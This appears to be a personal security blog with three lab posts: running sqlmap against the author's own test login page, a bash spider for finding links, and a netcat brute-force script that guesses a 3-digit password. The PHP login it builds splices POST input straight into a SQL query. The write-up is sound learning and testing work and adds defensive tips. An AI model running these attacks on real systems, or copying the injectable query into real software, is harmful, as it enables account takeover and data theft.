In a previous post I designed a simple web page that accepts a username and password. I chose to test that same page for SQL injection with a tool called sqlmap.
Looking at the traffic captured in the previous post, I noticed the data was posted as "username=test&password=test". I took this information and built the sqlmap command I was going to run.
python sqlmap.py --data="username=test&password=test" --url="http://test.local" -t http.log
It was after some research that I found the "-t" option, which writes the client requests and server responses out to a plain-text file.
The resulting http.log was a lot easier to work with than Wireshark, which I was using initially. I wanted to understand more about how sqlmap could gather the database name, the table names, and then their contents.
I grepped the http.log file for the keyword username= and, after URL-decoding the matches, found the SQL statements being sent back and forth. Then I analyzed the Set-Cookie header for the data that was being leaked.
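As a rough sketch of that grep and URL-decode step (assuming the traffic file is named http.log as in the command above, and that perl is available), something like the following pulls the injected payloads out in readable form:
grep "username=" http.log | perl -pe 's/\+/ /g; s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge'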
Observations to note:
1. Verify, when you create a variable that passes user data, that the size of that variable is checked. If the username or password had been truncated, sqlmap would not have been able to gather the data it needed.
2. Sanitize the data as it is passed in through POST or GET variables.
3. Hackers can hide what they are trying to accomplish from the HTTP logs, because POST data is not recorded in the URL.
4. If the username and password were incorrect, the sqlmap tool would not work properly.
5. Be careful disclosing the errors that may occur in a SQL query or on a web page. They can give hackers a clue as to how your application is designed.
Monday, September 3, 2012
Simple Bash HTTP Spider
I was tasked with finding broken links and links that did not point back to a parent site. Here is the simple Bash HTTP spider that I wrote. followMaster.txt ends up with the list of URLs referring back to the parent site, while links_outside.txt and links_outsideNew.txt hold the external links, i.e. the ones that do not contain the URL given as the argument.
Usage: ./spider.sh http://url.url
#!/bin/bash
# This script is designed to spider a web site for URLs
# The first argument is the URL that will be spidered...
# This core URL will remain as the spider goes through the site
# Will spider 5 rounds through the URLs found
if [ $# -eq 0 ]; then
    echo "Example: ./spider.sh url"
    echo "URL - URL to spider"
    echo ""
    exit
fi
wget "$1" -O main.txt
# Pull the href targets out of the start page: links containing the parent URL...
cat main.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep "$1" | sort | uniq > follow.txt
# ...and links that do not contain it (external links)
cat main.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep -v "$1" | sort | uniq > links_outside.txt
cp follow.txt followMaster.txt
rm -f followNew.txt
rm -f links_outsideNew.txt
touch followNew.txt
touch links_outsideNew.txt
for i in {1..5}
do
    while read line
    do
        wget "$line" -O child.txt
        cat child.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep "$1" | sort | uniq >> followNew.txt
        cat child.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep -v "$1" | sort | uniq >> links_outsideNew.txt
    done < "follow.txt"
    # Sort and find the unique links from the loop above for links related to the company
    cat followNew.txt | sort | uniq > followNew.temp
    cat followNew.temp > followNew.txt
    # Sort and find the unique links from the loop above for the links not related to the company
    cat links_outsideNew.txt | sort | uniq > links_outsideNew.temp
    cat links_outsideNew.temp > links_outsideNew.txt
    # Compare the links in follow.txt and followNew.txt and keep the new ones
    comm follow.txt followNew.txt -1 -3 > followMaster.temp
    # Append to the followMaster main file
    cat followMaster.temp >> followMaster.txt
    # Recreate a followMaster file of the URLs found and scanned
    cat followMaster.txt | sort | uniq > followMaster.temp
    cat followMaster.temp > followMaster.txt
    # Recreate the follow.txt file for another round if specified in the for loop
    comm followMaster.txt followNew.txt -1 -3 > follow.txt
done
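Since the original task was finding broken links, here is a small follow-up sketch (not part of the spider above, and assuming curl is installed) that checks the HTTP status of every URL the spider collected in followMaster.txt:
#!/bin/bash
# Report links in followMaster.txt that fail or return an HTTP error code
while read -r url; do
    code=$(curl -s -o /dev/null -w '%{http_code}' "$url")
    if [ "$code" -ge 400 ] || [ "$code" -eq 0 ]; then
        echo "BROKEN ($code): $url"
    fi
done < followMaster.txt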
Brute Force HTTP Login
The purpose of this post is to better understand how to brute force an HTTP login, so I took the time to design a really simple PHP web application backed by a MySQL database, giving me a test server to work against.
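For reference, here is a sketch of how the backing database could be set up. The database, table, and account names come from the checklogin.php code below; the column types and the mysql root invocation are my own assumptions.
mysql -u root -p <<'SQL'
CREATE DATABASE login;
-- GRANT ... IDENTIFIED BY creates the account on older MySQL; newer versions need CREATE USER first
GRANT ALL PRIVILEGES ON login.* TO 'dbuser'@'localhost' IDENTIFIED BY '123';
USE login;
CREATE TABLE usersTable (
    username VARCHAR(32),
    password VARCHAR(32)
);
INSERT INTO usersTable (username, password) VALUES ('test', '123');
SQL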
The PHP code that I used is below:
<HTML>
<BODY>
<FORM NAME="index" method="POST" action="checklogin.php">
<?php
echo '<TABLE><TR>';
echo '<TD>Username</TD><TD><input type=text name=username size=20></TD>';
echo '</TR><TR>';
echo '<TD>Password</TD><TD><input type=password name=password size=20></TD>';
echo '</TR><TR>';
echo '<TD COLSPAN=2><CENTER><input type=submit value=Login></CENTER></TD>';
echo '</TR></TABLE>';
?>
</FORM>
</BODY>
</HTML>
The PHP code for checklogin.php is below:
<HTML>
<BODY>
<?php
$host="localhost";
$username="dbuser";
$password="123";
$db_name="login";
$tbl_name="usersTable";
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
$usernamePOST=$_POST['username'];
$passwordPOST=$_POST['password'];
$loginSuccess = 'No';
$sql="SELECT * FROM $tbl_name WHERE username='$usernamePOST' and password='$passwordPOST'";
$result=mysql_query($sql);
while ($row = mysql_fetch_array($result)) {
    $userApp = $row['username'];
    $passApp = $row['password'];
    if (($userApp == $usernamePOST) && ($passApp == $passwordPOST)) {
        $loginSuccess = 'Yes';
    }
}
if ($loginSuccess == 'Yes') {
    echo "Login was Successful!";
}
else {
    echo "Login was unsuccessful!";
}
?>
</BODY>
</HTML>
Then I used Wireshark to capture the packet sent between the web browser and the web application. This packet shows me exactly what I need to send with nc (netcat) to interact with the page I built. The ASCII text of the packet that I need is below:
POST /checklogin.php HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://test.local/
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=test&password=test
After capturing the packet I needed a script that would brute force the username and/or password. For simplicity I chose the username test and a 3-digit password to design the script around. I had to pay attention to the Content-Length header because it changes based on the length of the username and password.
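Since the body is "username=test&password=" plus the password itself, the Content-Length can be checked with a quick one-liner, for example:
body="username=test&password=123"
echo "Content-Length: ${#body}"    # prints 26 for a 3-digit password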
In designing the script I also had to add a delay, because it otherwise quickly reached the maximum number of connections on the web server. When nc (netcat) was called, the connection stayed open for about 5 seconds, so I spaced the requests out by a few seconds. To avoid hitting the DNS server on every attempt I put the IP address directly into the nc (netcat) command. The biggest change I had to make was removing the Accept-Encoding: gzip line, otherwise the response came back gzipped; with it removed I got the clear-text response from the server.
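Before looping over every candidate, a single request can be tested by hand. The sketch below builds one POST (leaving out Accept-Encoding, and using Connection: close so nc exits once the server answers) and sends it straight to the server IP used in the script:
body="username=test&password=123"
{
  printf 'POST /checklogin.php HTTP/1.1\r\n'
  printf 'Host: server.local\r\n'
  printf 'Content-Type: application/x-www-form-urlencoded\r\n'
  printf 'Content-Length: %d\r\n' "${#body}"
  printf 'Connection: close\r\n\r\n'
  printf '%s' "$body"
} | nc 10.172.172.2 80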
The bash script I wrote is below:
#!/bin/bash
# 1st character
for i in {0..9}
do
    # 2nd character
    for j in {0..9}
    do
        # 3rd character
        for k in {0..9}
        do
            password=$i$j$k
            length=`expr length $password`
            # Populate the HTTP POST request
            echo "POST /checklogin.php HTTP/1.1" > temp/post-reply$i$j$k.txt
            echo "Host: server.local" >> temp/post-reply$i$j$k.txt
            echo "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2" >> temp/post-reply$i$j$k.txt
            echo "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" >> temp/post-reply$i$j$k.txt
            echo "Accept-Language: en-us,en;q=0.5" >> temp/post-reply$i$j$k.txt
            echo "Connection: keep-alive" >> temp/post-reply$i$j$k.txt
            echo "Referer: http://server.local/" >> temp/post-reply$i$j$k.txt
            echo "Content-Type: application/x-www-form-urlencoded" >> temp/post-reply$i$j$k.txt
            # Content-Length is 23 bytes for "username=test&password=" plus the password length
            if [ $length = 1 ]; then
                echo "Content-Length: 24" >> temp/post-reply$i$j$k.txt
            fi
            if [ $length = 2 ]; then
                echo "Content-Length: 25" >> temp/post-reply$i$j$k.txt
            fi
            if [ $length = 3 ]; then
                echo "Content-Length: 26" >> temp/post-reply$i$j$k.txt
            fi
            echo "" >> temp/post-reply$i$j$k.txt
            echo "username=test&password=$password" >> temp/post-reply$i$j$k.txt
            echo "" >> temp/post-reply$i$j$k.txt
            echo "" >> temp/post-reply$i$j$k.txt
            nc 10.172.172.2 80 < temp/post-reply$i$j$k.txt > response/response$i$j$k.txt &
            sleep 3
        done
    done
done
This was a success: I was able to find the username test and password '123' because the web page returned different results when the login was successful.
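Because the success and failure pages print different messages, a quick grep over the saved responses is enough to spot the hit, for example:
grep -l "Login was Successful!" response/*.txt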
To slow down a brute-force attack like this, you could place a temporary, time-delayed lockout on the account after a number of consecutive failed attempts. This was the first of many exercises I will be posting... Enjoy!